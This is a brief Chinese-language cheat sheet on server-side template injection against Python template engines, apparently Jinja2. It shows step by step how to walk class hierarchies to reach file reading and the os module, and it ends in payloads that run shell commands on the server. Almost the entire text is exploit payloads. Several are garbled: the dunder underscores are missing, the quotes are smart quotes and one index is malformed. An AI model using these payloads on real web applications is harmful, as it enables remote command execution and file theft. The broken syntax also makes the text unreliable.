{{‘’.class}}获取字符串的类对象

    {{‘’.class.mro}}寻找基类

    {{‘’.class.mro[1].subclasses()}}寻找可用引用

    #序号减一,类似数组
    比如在{{‘’.class.mro}}寻找基类后第三个是
    寻找的可用引用{{‘’.class.mro[2].subclasses()}}
    发现第41个是,就可以利用其读取文件了{{‘’.class.mro[2].subclasses()40.read()}}
    发现第72个是os相关,就可以利用os模块进行命令执行{{‘’.class.mro[2].subclasses()[71].init.globals[‘os’].system(‘ls’)}}

    再比如{{‘’.class.mro}}寻找基类后第二个是
    寻找的可用引用{{‘’.class.mro[1].subclasses()}}
    发现第133个是,就可以利用os模块进行命令执行
    payload:{{().class.mro[1].subclasses()[132].init.globals.popen(‘ls’).read()}}